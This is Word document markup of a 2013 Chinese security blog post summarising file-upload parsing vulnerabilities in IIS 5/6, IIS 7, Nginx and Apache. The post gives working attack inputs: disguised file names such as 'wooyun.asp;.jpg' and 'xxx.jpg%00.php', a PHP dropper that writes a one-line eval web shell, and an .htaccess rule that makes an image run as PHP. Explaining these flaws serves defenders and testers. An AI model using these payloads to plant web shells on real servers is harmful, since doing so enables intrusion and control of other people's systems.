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4FA" w:rsidRPr="001F14FA" w:rsidRDefault="001F14FA" w:rsidP="001F14FA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:tooltip="Permanent Link to 解析漏洞总结" w:history="1">
        <w:r w:rsidRPr="001F14FA">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0B59B2"/>
            <w:kern w:val="0"/>
            <w:sz w:val="27"/>
          </w:rPr>
          <w:t>解析漏洞总结</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001F14FA" w:rsidRPr="001F14FA" w:rsidRDefault="001F14FA" w:rsidP="001F14FA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F14FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidRPr="001F14FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>人收藏</w:t>
      </w:r>
      <w:r w:rsidRPr="001F14FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="001F14FA">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="99776B"/>
            <w:kern w:val="0"/>
            <w:sz w:val="18"/>
          </w:rPr>
          <w:t>收藏</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001F14FA" w:rsidRPr="001F14FA" w:rsidRDefault="001F14FA" w:rsidP="001F14FA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="240" w:lineRule="auto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2013/09/02 11:25</w:t>
      </w:r>
      <w:r w:rsidRPr="001F14FA">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> | </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tooltip="由 erevus 发布" w:history="1">
        <w:r w:rsidRPr="001F14FA">
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
            <w:color w:val="0B59B2"/>
            <w:kern w:val="0"/>
            <w:sz w:val="18"/>
          </w:rPr>
          <w:t>erevus</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001F14FA">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> | </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:tooltip="查看 漏洞分析 中的全部文章" w:history="1">
        <w:r w:rsidRPr="001F14FA">
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
            <w:color w:val="0B59B2"/>
            <w:kern w:val="0"/>
            <w:sz w:val="18"/>
          </w:rPr>
          <w:t>漏洞分析</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001F14FA">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> | </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:anchor="respond" w:history="1">
        <w:r w:rsidRPr="001F14FA">
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
            <w:color w:val="0B59B2"/>
            <w:kern w:val="0"/>
            <w:sz w:val="18"/>
          </w:rPr>
          <w:t>占个座先</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001F14FA" w:rsidRPr="001F14FA" w:rsidRDefault="001F14FA" w:rsidP="001F14FA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F14FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>一、</w:t>
      </w:r>
      <w:r w:rsidRPr="001F14FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>IIS 5.x/6.0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F14FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>解析漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F14FA" w:rsidRPr="001F14FA" w:rsidRDefault="001F14FA" w:rsidP="001F14FA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pict>
          <v:rect id="_x0000_i1025" style="width:0;height:3.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pic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IIS 6.0解析利用方法有两种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1.目录解析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F14FA" w:rsidRPr="001F14FA" w:rsidRDefault="001F14FA" w:rsidP="001F14FA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hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F14FA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>/xx.asp/xx.jpg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2.文件解析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F14FA" w:rsidRPr="001F14FA" w:rsidRDefault="001F14FA" w:rsidP="001F14FA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hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F14FA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wooyun.asp;.jpg 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第一种，在网站下建立文件夹的名字为</w:t>
      </w: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</w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F14FA">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.asp、</w:t>
      </w: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.asa 的文件夹，其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。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例如创建目录 wooyun.asp，那么</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F14FA" w:rsidRPr="001F14FA" w:rsidRDefault="001F14FA" w:rsidP="001F14FA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hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F14FA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>/wooyun.asp/1.jpg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将被当作asp文件来执行。假设黑阔可以控制上传文件夹路径,就可以不管你上传后你的图片改不改名都能拿shell了。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第二种，在IIS6.0下，分号后面的不被解析，也就是说</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F14FA" w:rsidRPr="001F14FA" w:rsidRDefault="001F14FA" w:rsidP="001F14FA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hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F14FA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>wooyun.asp;.jpg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会被服务器看成是wooyun.asp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还有IIS6.0 默认的可执行文件除了asp还包含这三种</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F14FA" w:rsidRPr="001F14FA" w:rsidRDefault="001F14FA" w:rsidP="001F14FA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hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F14FA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>/wooyun.asa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F14FA" w:rsidRPr="001F14FA" w:rsidRDefault="001F14FA" w:rsidP="001F14FA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hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F14FA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>/wooyun.cer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F14FA" w:rsidRPr="001F14FA" w:rsidRDefault="001F14FA" w:rsidP="001F14FA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hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F14FA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>/wooyun.cdx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乌云上的IIS 6.0解析漏洞利用案例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hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="001F14FA">
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
            <w:color w:val="0B59B2"/>
            <w:kern w:val="0"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>http://www.wooyun.org/searchbug.php?q=IIS6.0</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001F14FA" w:rsidRPr="001F14FA" w:rsidRDefault="001F14FA" w:rsidP="001F14FA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F14FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>二、</w:t>
      </w:r>
      <w:r w:rsidRPr="001F14FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>IIS 7.0/IIS 7.5/ Nginx &lt;8.03</w:t>
      </w:r>
      <w:r w:rsidRPr="001F14FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>畸形解析漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F14FA" w:rsidRPr="001F14FA" w:rsidRDefault="001F14FA" w:rsidP="001F14FA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pict>
          <v:rect id="_x0000_i1026" style="width:0;height:3.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pic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Nginx解析漏洞这个伟大的漏洞是我国安全组织80sec发现的…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在默认Fast-CGI开启状况下,黑阔上传一个名字为wooyun.jpg，内容为</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F14FA" w:rsidRPr="001F14FA" w:rsidRDefault="001F14FA" w:rsidP="001F14FA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hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F14FA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>&lt;?PHP fputs(fopen('shell.php','w'),'&lt;?php eval($_POST[cmd])?&gt;');?&gt;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的文件，然后访问wooyun.jpg/.php,在这个目录下就会生成一句话木马 shell.php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这个漏洞案例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hyperlink r:id="rId12" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="001F14FA">
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
            <w:color w:val="0B59B2"/>
            <w:kern w:val="0"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>WooYun: 用友软件某分站SQL注入漏洞+nginx解析漏洞</w:t>
        </w:r>
      </w:hyperlink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hyperlink r:id="rId13" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="001F14FA">
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
            <w:color w:val="0B59B2"/>
            <w:kern w:val="0"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>WooYun: 新浪网分站多处安全漏洞（nginx解析+SQL注射等）小礼包</w:t>
        </w:r>
      </w:hyperlink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hyperlink r:id="rId14" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="001F14FA">
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
            <w:color w:val="0B59B2"/>
            <w:kern w:val="0"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>WooYun: kingsoft.com某x级域名nginx解析漏洞+爆路径</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001F14FA" w:rsidRPr="001F14FA" w:rsidRDefault="001F14FA" w:rsidP="001F14FA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F14FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>三、</w:t>
      </w:r>
      <w:r w:rsidRPr="001F14FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>Nginx &lt;8.03 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F14FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>空字节代码执行漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F14FA" w:rsidRPr="001F14FA" w:rsidRDefault="001F14FA" w:rsidP="001F14FA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pict>
          <v:rect id="_x0000_i1027" style="width:0;height:3.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pic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影响版:0.5.</w:t>
      </w:r>
      <w:r w:rsidRPr="001F14FA">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>,0.6.</w:t>
      </w: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, 0.7 &lt;= 0.7.65, 0.8 &lt;= 0.8.37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Nginx在图片中嵌入PHP代码然后通过访问</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F14FA" w:rsidRPr="001F14FA" w:rsidRDefault="001F14FA" w:rsidP="001F14FA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hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F14FA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>xxx.jpg%00.php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来执行其中的代码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Nginx 空字节代执行漏洞案例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hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="001F14FA">
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
            <w:color w:val="0B59B2"/>
            <w:kern w:val="0"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>http://www.wooyun.org/searchbug.php?q=%2500.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001F14FA" w:rsidRPr="001F14FA" w:rsidRDefault="001F14FA" w:rsidP="001F14FA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F14FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>四、</w:t>
      </w:r>
      <w:r w:rsidRPr="001F14FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r w:rsidRPr="001F14FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>解析漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F14FA" w:rsidRPr="001F14FA" w:rsidRDefault="001F14FA" w:rsidP="001F14FA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pict>
          <v:rect id="_x0000_i1028" style="width:0;height:3.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pic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Apache 是从右到左开始判断解析,如果为不可识别解析,就再往左判断.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比如 wooyun.php.owf.rar “.owf”和”.rar” 这两种后缀是apache不可识别解析,apache就会把wooyun.php.owf.rar解析成php.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如何判断是不是合法的后缀就是这个漏洞的利用关键,测试时可以尝试上传一个wooyun.php.rara.jpg.png…（把你知道的常见后缀都写上…）去测试是否是合法后缀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Apache解析漏洞案例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hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="001F14FA">
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
            <w:color w:val="0B59B2"/>
            <w:kern w:val="0"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>http://www.wooyun.org/searchbug.php?q=apache%E8%A7%A3%E6%9E%90</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001F14FA" w:rsidRPr="001F14FA" w:rsidRDefault="001F14FA" w:rsidP="001F14FA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F14FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>五、其他</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F14FA" w:rsidRPr="001F14FA" w:rsidRDefault="001F14FA" w:rsidP="001F14FA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75"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pict>
          <v:rect id="_x0000_i1029" style="width:0;height:3.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pic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在windows环境下，xx.jpg[空格] 或xx.jpg. 这两类文件都是不允许存在的，若这样命名，windows会默认除去空格或点,黑客可以通过抓包，在文件名后加一个空格或者点绕过黑名单.若上传成功，空格和点都会被windows自动消除,这样也可以getshell。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如果在Apache中.htaccess可被执行.且可被上传.那可以尝试在.htaccess中写入: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F14FA" w:rsidRPr="001F14FA" w:rsidRDefault="001F14FA" w:rsidP="001F14FA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hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F14FA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>&lt;FilesMatch "wooyun.jpg"&gt; SetHandler application/x-httpd-php &lt;/FilesMatch&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F14FA" w:rsidRPr="001F14FA" w:rsidRDefault="001F14FA" w:rsidP="001F14FA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</w:pPr>
      <w:r w:rsidRPr="001F14FA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然后再上传shell.jpg的木马, 这样shell.jpg就可解析为php文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001342DD" w:rsidRPr="001F14FA" w:rsidRDefault="001342DD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="001342DD" w:rsidRPr="001F14FA" w:rsidSect="0013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421" w:rsidRDefault="00317421" w:rsidP="001F14FA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00317421" w:rsidRDefault="00317421" w:rsidP="001F1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421" w:rsidRDefault="00317421" w:rsidP="001F14FA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00317421" w:rsidRDefault="00317421" w:rsidP="001F14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4FA"/>
    <w:rsid w:val="00001A12"/>
    <w:rsid w:val="00002184"/>
    <w:rsid w:val="00002A44"/>
    <w:rsid w:val="000053A5"/>
    <w:rsid w:val="00006465"/>
    <w:rsid w:val="00007BB7"/>
    <w:rsid w:val="00011719"/>
    <w:rsid w:val="000117A1"/>
    <w:rsid w:val="00011AD2"/>
    <w:rsid w:val="00012575"/>
    <w:rsid w:val="00013684"/>
    <w:rsid w:val="00014050"/>
    <w:rsid w:val="000155CF"/>
    <w:rsid w:val="00015A4E"/>
    <w:rsid w:val="00015B3F"/>
    <w:rsid w:val="00017132"/>
    <w:rsid w:val="00017548"/>
    <w:rsid w:val="00020F98"/>
    <w:rsid w:val="0002412A"/>
    <w:rsid w:val="00024479"/>
    <w:rsid w:val="00025A39"/>
    <w:rsid w:val="00026946"/>
    <w:rsid w:val="00026975"/>
    <w:rsid w:val="00026AA3"/>
    <w:rsid w:val="00027014"/>
    <w:rsid w:val="0002785B"/>
    <w:rsid w:val="00027B86"/>
    <w:rsid w:val="000317AA"/>
    <w:rsid w:val="0003220D"/>
    <w:rsid w:val="00032CFF"/>
    <w:rsid w:val="0003329F"/>
    <w:rsid w:val="00033529"/>
    <w:rsid w:val="000337EE"/>
    <w:rsid w:val="00033D62"/>
    <w:rsid w:val="00034973"/>
    <w:rsid w:val="00035265"/>
    <w:rsid w:val="000352C4"/>
    <w:rsid w:val="000354B3"/>
    <w:rsid w:val="000365BD"/>
    <w:rsid w:val="00036F84"/>
    <w:rsid w:val="0003709C"/>
    <w:rsid w:val="00041194"/>
    <w:rsid w:val="00041FCD"/>
    <w:rsid w:val="000433B7"/>
    <w:rsid w:val="00043960"/>
    <w:rsid w:val="00045BF7"/>
    <w:rsid w:val="00047533"/>
    <w:rsid w:val="00050354"/>
    <w:rsid w:val="00051B11"/>
    <w:rsid w:val="00053114"/>
    <w:rsid w:val="00054655"/>
    <w:rsid w:val="00055F52"/>
    <w:rsid w:val="0005662A"/>
    <w:rsid w:val="00057685"/>
    <w:rsid w:val="000616FD"/>
    <w:rsid w:val="00061C2B"/>
    <w:rsid w:val="0006204F"/>
    <w:rsid w:val="00062A32"/>
    <w:rsid w:val="00064063"/>
    <w:rsid w:val="00064128"/>
    <w:rsid w:val="000645E9"/>
    <w:rsid w:val="00064A16"/>
    <w:rsid w:val="00066BC1"/>
    <w:rsid w:val="0007030F"/>
    <w:rsid w:val="0007091E"/>
    <w:rsid w:val="00074A2D"/>
    <w:rsid w:val="00074B24"/>
    <w:rsid w:val="0007537E"/>
    <w:rsid w:val="00076057"/>
    <w:rsid w:val="00076934"/>
    <w:rsid w:val="00076B37"/>
